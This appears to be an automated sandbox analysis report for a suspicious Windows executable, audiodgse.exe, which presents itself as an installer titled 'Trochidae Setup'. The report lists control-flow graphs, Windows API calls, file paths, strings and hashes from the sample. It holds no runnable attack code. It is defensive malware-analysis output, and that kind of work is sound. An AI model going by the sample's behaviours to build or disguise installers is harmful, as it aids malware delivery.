                                                  control_flow_graph 134 40523f-40525b 135 405261-405328 GetDlgItem * 3 call 40409d call 40498e GetClientRect GetSystemMetrics SendMessageA * 2 134->135 136 4053ea-4053f0 134->136 154 405346-405349 135->154 155 40532a-405344 SendMessageA * 2 135->155 138 4053f2-405414 GetDlgItem CreateThread CloseHandle 136->138 139 40541a-405426 136->139 138->139 140 405448-40544e 139->140 141 405428-40542e 139->141 145 405450-405456 140->145 146 4054a3-4054a6 140->146 143 405430-405443 ShowWindow * 2 call 40409d 141->143 144 405469-405470 call 4040cf 141->144 143->140 158 405475-405479 144->158 150 405458-405464 call 404041 145->150 151 40547c-40548c ShowWindow 145->151 146->144 148 4054a8-4054ae 146->148 148->144 156 4054b0-4054c3 SendMessageA 148->156 150->144 159 40549c-40549e call 404041 151->159 160 40548e-405497 call 405101 151->160 161 405359-405370 call 404068 154->161 162 40534b-405357 SendMessageA 154->162 155->154 163 4055c0-4055c2 156->163 164 4054c9-4054f5 CreatePopupMenu call 405ffc AppendMenuA 156->164 159->146 160->159 173 405372-405386 ShowWindow 161->173 174 4053a6-4053c7 GetDlgItem SendMessageA 161->174 162->161 163->158 171 4054f7-405507 GetWindowRect 164->171 172 40550a-405520 TrackPopupMenu 164->172 171->172 172->163 175 405526-405540 172->175 176 405395 173->176 177 405388-405393 ShowWindow 173->177 174->163 178 4053cd-4053e5 SendMessageA * 2 174->178 179 405545-405560 SendMessageA 175->179 180 40539b-4053a1 call 40409d 176->180 177->180 178->163 179->179 181 405562-405582 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 179->181 180->174 183 405584-4055a4 SendMessageA 181->183 183->183 184 4055a6-4055ba GlobalUnlock SetClipboardData CloseClipboard 183->184 184->163
                                                  APIs
                                                  • GetDlgItem.USER32(?,00000403), ref: 0040529E
                                                  • GetDlgItem.USER32(?,000003EE), ref: 004052AD
                                                  • GetClientRect.USER32 ref: 004052EA
                                                  • GetSystemMetrics.USER32 ref: 004052F1
                                                  • SendMessageA.USER32 ref: 00405312
                                                  • SendMessageA.USER32 ref: 00405323
                                                  • SendMessageA.USER32 ref: 00405336
                                                  • SendMessageA.USER32 ref: 00405344
                                                  • SendMessageA.USER32 ref: 00405357
                                                  • ShowWindow.USER32(00000000,?), ref: 00405379
                                                  • ShowWindow.USER32(?,00000008), ref: 0040538D
                                                  • GetDlgItem.USER32(?,000003EC), ref: 004053AE
                                                  • SendMessageA.USER32 ref: 004053BE
                                                  • SendMessageA.USER32 ref: 004053D7
                                                  • SendMessageA.USER32 ref: 004053E3
                                                  • GetDlgItem.USER32(?,000003F8), ref: 004052BC
                                                    • Part of subcall function 0040409D: SendMessageA.USER32 ref: 004040AB
                                                  • GetDlgItem.USER32(?,000003EC), ref: 004053FF
                                                  • CreateThread.KERNELBASE(00000000,00000000,Function_000051D3,00000000), ref: 0040540D
                                                  • CloseHandle.KERNELBASE(00000000), ref: 00405414
                                                  • ShowWindow.USER32(00000000), ref: 00405437
                                                  • ShowWindow.USER32(?,00000008), ref: 0040543E
                                                  • ShowWindow.USER32(00000008), ref: 00405484
                                                  • SendMessageA.USER32 ref: 004054B8
                                                  • CreatePopupMenu.USER32 ref: 004054C9
                                                  • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004054DE
                                                  • GetWindowRect.USER32(?,000000FF), ref: 004054FE
                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405517
                                                  • SendMessageA.USER32 ref: 00405553
                                                  • OpenClipboard.USER32(00000000), ref: 00405563
                                                  • EmptyClipboard.USER32 ref: 00405569
                                                  • GlobalAlloc.KERNEL32(00000042,?), ref: 00405572
                                                  • GlobalLock.KERNEL32 ref: 0040557C
                                                  • SendMessageA.USER32 ref: 00405590
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 004055A9
                                                  • SetClipboardData.USER32 ref: 004055B4
                                                  • CloseClipboard.USER32 ref: 004055BA
                                                  Strings
                                                  • Trochidae Setup: Installing, xrefs: 0040552F
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                  • String ID: Trochidae Setup: Installing
                                                  • API String ID: 590372296-4121273588
                                                  • Opcode ID: 5e248db37e798cb99e868fa2efa30f8b142e25c36e83f8749ee739c671aa7136
                                                  • Instruction ID: b9a96890980d2d8b9797d0de0d5ce2eab2fec2a682b8a0b11cb6d69254f0e8d6
                                                  • Opcode Fuzzy Hash: 5e248db37e798cb99e868fa2efa30f8b142e25c36e83f8749ee739c671aa7136
                                                  • Instruction Fuzzy Hash: C4A15CB1900208BFDB119FA0DD89AAE7FB9FB48355F00403AFA05B61A0C7B55E51DF69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 72BE1215: GlobalAlloc.KERNELBASE(00000040,72BE1233,?,72BE12CF,-72BE404B,72BE11AB,-000000A0), ref: 72BE121D
                                                  • GlobalAlloc.KERNELBASE(00000040,000014A4), ref: 72BE1BC4
                                                  • lstrcpyA.KERNEL32(00000008,?), ref: 72BE1C0C
                                                  • lstrcpyA.KERNEL32(00000408,?), ref: 72BE1C16
                                                  • GlobalFree.KERNEL32(00000000), ref: 72BE1C29
                                                  • GlobalFree.KERNEL32(?), ref: 72BE1D09
                                                  • GlobalFree.KERNEL32(?), ref: 72BE1D0E
                                                  • GlobalFree.KERNEL32(?), ref: 72BE1D13
                                                  • GlobalFree.KERNEL32(00000000), ref: 72BE1EFA
                                                  • lstrcpyA.KERNEL32(?,?), ref: 72BE2098
                                                  • GetModuleHandleA.KERNEL32(00000008), ref: 72BE2114
                                                  • LoadLibraryA.KERNEL32(00000008), ref: 72BE2125
                                                  • GetProcAddress.KERNEL32(?,?), ref: 72BE217E
                                                  • lstrlenA.KERNEL32(00000408), ref: 72BE2198
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1054702940.0000000072BE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 72BE0000, based on PE: true
                                                  • Associated: 00000005.00000002.1054694462.0000000072BE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000005.00000002.1054709441.0000000072BE3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000005.00000002.1054717890.0000000072BE5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_72be0000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                  • String ID:
                                                  • API String ID: 245916457-0
                                                  • Opcode ID: 08684463e5a4f44f53ad76b025a75244e0fbb793c4e47ff614150fffb5089be8
                                                  • Instruction ID: ca1ae589501bc9a0af2804c439660dd81e281ed9eb8c8c9baf288abbbd3e5850
                                                  • Opcode Fuzzy Hash: 08684463e5a4f44f53ad76b025a75244e0fbb793c4e47ff614150fffb5089be8
                                                  • Instruction Fuzzy Hash: CD228EB1D24209DFDB118FACC8807ADBBF5FB84305F2095AED197E6284E7745A81CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 714 4057a2-4057c8 call 405a60 717 4057e1-4057e8 714->717 718 4057ca-4057dc DeleteFileA 714->718 720 4057ea-4057ec 717->720 721 4057fb-40580b call 405fda 717->721 719 40596b-40596f 718->719 723 4057f2-4057f5 720->723 724 405919-40591e 720->724 727 40581a-40581b call 4059b9 721->727 728 40580d-405818 lstrcatA 721->728 723->721 723->724 724->719 726 405920-405923 724->726 729 405925-40592b 726->729 730 40592d-405935 call 4062dd 726->730 731 405820-405823 727->731 728->731 729->719 730->719 737 405937-40594b call 405972 call 40575a 730->737 734 405825-40582c 731->734 735 40582e-405834 lstrcatA 731->735 734->735 738 405839-405857 lstrlenA FindFirstFileA 734->738 735->738 752 405963-405966 call 405101 737->752 753 40594d-405950 737->753 740 40585d-405874 call 40599d 738->740 741 40590f-405913 738->741 748 405876-40587a 740->748 749 40587f-405882 740->749 741->724 743 405915 741->743 743->724 748->749 754 40587c 748->754 750 405884-405889 749->750 751 405895-4058a3 call 405fda 749->751 755 40588b-40588d 750->755 756 4058ee-405900 FindNextFileA 750->756 764 4058a5-4058ad 751->764 765 4058ba-4058c5 call 40575a 751->765 752->719 753->729 758 405952-405961 call 405101 call 405db9 753->758 754->749 755->751 760 40588f-405893 755->760 756->740 762 405906-405909 FindClose 756->762 758->719 760->751 760->756 762->741 764->756 767 4058af-4058b8 call 4057a2 764->767 774 4058e6-4058e9 call 405101 765->774 775 4058c7-4058ca 765->775 767->756 774->756 777 4058cc-4058dc call 405101 call 405db9 775->777 778 4058de-4058e4 775->778 777->756 778->756
                                                  APIs
                                                  • DeleteFileA.KERNELBASE(?,?,75712754,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004057CB
                                                  • lstrcatA.KERNEL32(00420D10,\*.*,00420D10,?,?,75712754,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405813
                                                  • lstrcatA.KERNEL32(?,00409014,?,00420D10,?,?,75712754,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405834
                                                  • lstrlenA.KERNEL32(?,?,00409014,?,00420D10,?,?,75712754,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040583A
                                                  • FindFirstFileA.KERNEL32(00420D10,?,?,?,00409014,?,00420D10,?,?,75712754,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040584B
                                                  • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004058F8
                                                  • FindClose.KERNEL32(00000000), ref: 00405909
                                                  Strings
                                                  • "C:\Users\user\AppData\Roaming\audiodgse.exe" , xrefs: 004057A2
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004057AF
                                                  • \*.*, xrefs: 0040580D
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                  • String ID: "C:\Users\user\AppData\Roaming\audiodgse.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                                                  • API String ID: 2035342205-1373421629
                                                  • Opcode ID: 9534ed492e479d78e2508825cc8aff22a23d0aad2da830bd7208bf437f0dd8c3
                                                  • Instruction ID: d5f8e1a5a2f38c4268bcbec4acbb3c578bb2518a62eabdffbc14051f19ad4651
                                                  • Opcode Fuzzy Hash: 9534ed492e479d78e2508825cc8aff22a23d0aad2da830bd7208bf437f0dd8c3
                                                  • Instruction Fuzzy Hash: F251E171900A18BADB21BB228C45BAF7A79DF42724F14807BF841B51D2D77C8942DEAD
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b42b921e85d89c0e117f5f9f4e0d0c16e752254418a7148ec341c06b29f841c9
                                                  • Instruction ID: 4f714145f5a313d6319dbd2ae6a602097e3dd159542c3e152d0bb7460fb66c8d
                                                  • Opcode Fuzzy Hash: b42b921e85d89c0e117f5f9f4e0d0c16e752254418a7148ec341c06b29f841c9
                                                  • Instruction Fuzzy Hash: 25F17571D00229CBDF28CFA8C8946ADBBB0FF44305F25856ED856BB281D7395A96CF44
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • FindFirstFileA.KERNELBASE(?,00421558,C:\Users\user\AppData\Local\Temp\nsfF9C.tmp,00405AA3,C:\Users\user\AppData\Local\Temp\nsfF9C.tmp,C:\Users\user\AppData\Local\Temp\nsfF9C.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsfF9C.tmp,C:\Users\user\AppData\Local\Temp\nsfF9C.tmp,T'qu,?,C:\Users\user\AppData\Local\Temp\,004057C2,?,75712754,C:\Users\user\AppData\Local\Temp\), ref: 004062E8
                                                  • FindClose.KERNEL32(00000000), ref: 004062F4
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\nsfF9C.tmp, xrefs: 004062DD
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID: Find$CloseFileFirst
                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsfF9C.tmp
                                                  • API String ID: 2295610775-4240112750
                                                  • Opcode ID: 78efce08eb58f860d58d9cc4337d862744689776f4b13788d4bc070c197dd51e
                                                  • Instruction ID: 9f0851c2fc9ceccd35e24d87c19841e9ead441a619ffea6187f1505ec1ede2b7
                                                  • Opcode Fuzzy Hash: 78efce08eb58f860d58d9cc4337d862744689776f4b13788d4bc070c197dd51e
                                                  • Instruction Fuzzy Hash: B1D012319090207BC30117386E0C85B7A599B553317228A77F967F12F0C7388C7696E9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 185 403b94-403ba6 186 403ce7-403cf6 185->186 187 403bac-403bb2 185->187 189 403d45-403d5a 186->189 190 403cf8-403d40 GetDlgItem * 2 call 404068 SetClassLongA call 40140b 186->190 187->186 188 403bb8-403bc1 187->188 191 403bc3-403bd0 SetWindowPos 188->191 192 403bd6-403bd9 188->192 194 403d9a-403d9f call 4040b4 189->194 195 403d5c-403d5f 189->195 190->189 191->192 197 403bf3-403bf9 192->197 198 403bdb-403bed ShowWindow 192->198 204 403da4-403dbf 194->204 200 403d61-403d6c call 401389 195->200 201 403d92-403d94 195->201 205 403c15-403c18 197->205 206 403bfb-403c10 DestroyWindow 197->206 198->197 200->201 216 403d6e-403d8d SendMessageA 200->216 201->194 203 404035 201->203 211 404037-40403e 203->211 209 403dc1-403dc3 call 40140b 204->209 210 403dc8-403dce 204->210 214 403c1a-403c26 SetWindowLongA 205->214 215 403c2b-403c31 205->215 212 404012-404018 206->212 209->210 219 403ff3-40400c DestroyWindow EndDialog 210->219 220 403dd4-403ddf 210->220 212->203 218 40401a-404020 212->218 214->211 221 403cd4-403ce2 call 4040cf 215->221 222 403c37-403c48 GetDlgItem 215->222 216->211 218->203 226 404022-40402b ShowWindow 218->226 219->212 220->219 227 403de5-403e32 call 405ffc call 404068 * 3 GetDlgItem 220->227 221->211 223 403c67-403c6a 222->223 224 403c4a-403c61 SendMessageA IsWindowEnabled 222->224 228 403c6c-403c6d 223->228 229 403c6f-403c72 223->229 224->203 224->223 226->203 255 403e34-403e39 227->255 256 403e3c-403e78 ShowWindow KiUserCallbackDispatcher call 40408a EnableWindow 227->256 232 403c9d-403ca2 call 404041 228->232 233 403c80-403c85 229->233 234 403c74-403c7a 229->234 232->221 236 403cbb-403cce SendMessageA 233->236 238 403c87-403c8d 233->238 234->236 237 403c7c-403c7e 234->237 236->221 237->232 241 403ca4-403cad call 40140b 238->241 242 403c8f-403c95 call 40140b 238->242 241->221 251 403caf-403cb9 241->251 253 403c9b 242->253 251->253 253->232 255->256 259 403e7a-403e7b 256->259 260 403e7d 256->260 261 403e7f-403ead GetSystemMenu EnableMenuItem SendMessageA 259->261 260->261 262 403ec2 261->262 263 403eaf-403ec0 SendMessageA 261->263 264 403ec8-403f02 call 40409d call 403b75 call 405fda lstrlenA call 405ffc SetWindowTextA call 401389 262->264 263->264 264->204 275 403f08-403f0a 264->275 275->204 276 403f10-403f14 275->276 277 403f33-403f47 DestroyWindow 276->277 278 403f16-403f1c 276->278 277->212 280 403f4d-403f7a CreateDialogParamA 277->280 278->203 279 403f22-403f28 278->279 279->204 281 403f2e 279->281 280->212 282 403f80-403fd7 call 404068 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 280->282 281->203 282->203 287 403fd9-403fec ShowWindow call 4040b4 282->287 289 403ff1 287->289 289->212
                                                  APIs
                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403BD0
                                                  • ShowWindow.USER32(?), ref: 00403BED
                                                  • DestroyWindow.USER32 ref: 00403C01
                                                  • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403C1D
                                                  • GetDlgItem.USER32(?,?), ref: 00403C3E
                                                  • SendMessageA.USER32 ref: 00403C52
                                                  • IsWindowEnabled.USER32(00000000), ref: 00403C59
                                                  • GetDlgItem.USER32(?,00000001), ref: 00403D07
                                                  • GetDlgItem.USER32(?,00000002), ref: 00403D11
                                                  • SetClassLongA.USER32(?,000000F2,?), ref: 00403D2B
                                                  • SendMessageA.USER32 ref: 00403D7C
                                                  • GetDlgItem.USER32(?,00000003), ref: 00403E22
                                                  • ShowWindow.USER32(00000000,?), ref: 00403E43
                                                  • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403E55
                                                  • EnableWindow.USER32(?,?), ref: 00403E70
                                                  • GetSystemMenu.USER32 ref: 00403E86
                                                  • EnableMenuItem.USER32 ref: 00403E8D
                                                  • SendMessageA.USER32 ref: 00403EA5
                                                  • SendMessageA.USER32 ref: 00403EB8
                                                  • lstrlenA.KERNEL32(Trochidae Setup: Installing,?,Trochidae Setup: Installing,00000000), ref: 00403EE2
                                                  • SetWindowTextA.USER32(?,Trochidae Setup: Installing), ref: 00403EF1
                                                  • ShowWindow.USER32(?,0000000A), ref: 00404025
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                  • String ID: Trochidae Setup: Installing
                                                  • API String ID: 3282139019-4121273588
                                                  • Opcode ID: e57483be0e8f0953cc8724a3e8c8ea21599a840bb85b0af5ee6d9011d8646a3c
                                                  • Instruction ID: ba3e3afbb1df49eb3663f2526bbc67ab17a8ece20d2805bf2467eb782e73bce3
                                                  • Opcode Fuzzy Hash: e57483be0e8f0953cc8724a3e8c8ea21599a840bb85b0af5ee6d9011d8646a3c
                                                  • Instruction Fuzzy Hash: FEC1AEB2604205BBDB206F61ED49D2B7A6CFB85706F40443EF641B11F1C779A942EB2E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 290 4037f7-40380f call 406372 293 403811-403821 call 405f38 290->293 294 403823-403854 call 405ec1 290->294 302 403877-4038a0 call 403abc call 405a60 293->302 298 403856-403867 call 405ec1 294->298 299 40386c-403872 lstrcatA 294->299 298->299 299->302 308 4038a6-4038ab 302->308 309 403927-40392f call 405a60 302->309 308->309 310 4038ad-4038d1 call 405ec1 308->310 314 403931-403938 call 405ffc 309->314 315 40393d-403962 LoadImageA 309->315 310->309 320 4038d3-4038d5 310->320 314->315 318 4039e3-4039eb call 40140b 315->318 319 403964-403994 RegisterClassA 315->319 333 4039f5-403a00 call 403abc 318->333 334 4039ed-4039f0 318->334 323 403ab2 319->323 324 40399a-4039de SystemParametersInfoA CreateWindowExA 319->324 321 4038e6-4038f2 lstrlenA 320->321 322 4038d7-4038e4 call 40599d 320->322 328 4038f4-403902 lstrcmpiA 321->328 329 40391a-403922 call 405972 call 405fda 321->329 322->321 327 403ab4-403abb 323->327 324->318 328->329 332 403904-40390e GetFileAttributesA 328->332 329->309 336 403910-403912 332->336 337 403914-403915 call 4059b9 332->337 343 403a06-403a20 ShowWindow call 406304 333->343 344 403a89-403a8a call 4051d3 333->344 334->327 336->329 336->337 337->329 351 403a22-403a27 call 406304 343->351 352 403a2c-403a3e GetClassInfoA 343->352 347 403a8f-403a91 344->347 349 403a93-403a99 347->349 350 403aab-403aad call 40140b 347->350 349->334 357 403a9f-403aa6 call 40140b 349->357 350->323 351->352 355 403a40-403a50 GetClassInfoA RegisterClassA 352->355 356 403a56-403a79 DialogBoxParamA call 40140b 352->356 355->356 360 403a7e-403a87 call 403747 356->360 357->334 360->327
                                                  APIs
                                                    • Part of subcall function 00406372: GetModuleHandleA.KERNEL32(?,?,?,004032A8,0000000A), ref: 00406384
                                                    • Part of subcall function 00406372: GetProcAddress.KERNEL32(00000000,?,?,?,004032A8,0000000A), ref: 0040639F
                                                  • lstrcatA.KERNEL32(1033,Trochidae Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Trochidae Setup: Installing,00000000,00000002,75712754,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\AppData\Roaming\audiodgse.exe" ,00000000), ref: 00403872
                                                  • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens,1033,Trochidae Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Trochidae Setup: Installing,00000000,00000002,75712754), ref: 004038E7
                                                  • lstrcmpiA.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens,1033,Trochidae Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Trochidae Setup: Installing,00000000), ref: 004038FA
                                                  • GetFileAttributesA.KERNEL32(Call), ref: 00403905
                                                  • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens), ref: 0040394E
                                                    • Part of subcall function 00405F38: wsprintfA.USER32 ref: 00405F45
                                                  • RegisterClassA.USER32(00422EA0), ref: 0040398B
                                                  • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004039A3
                                                  • CreateWindowExA.USER32 ref: 004039D8
                                                  • ShowWindow.USER32(00000005,00000000), ref: 00403A0E
                                                  • GetClassInfoA.USER32(00000000,RichEdit20A,00422EA0), ref: 00403A3A
                                                  • GetClassInfoA.USER32(00000000,RichEdit,00422EA0), ref: 00403A47
                                                  • RegisterClassA.USER32(00422EA0), ref: 00403A50
                                                  • DialogBoxParamA.USER32 ref: 00403A6F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
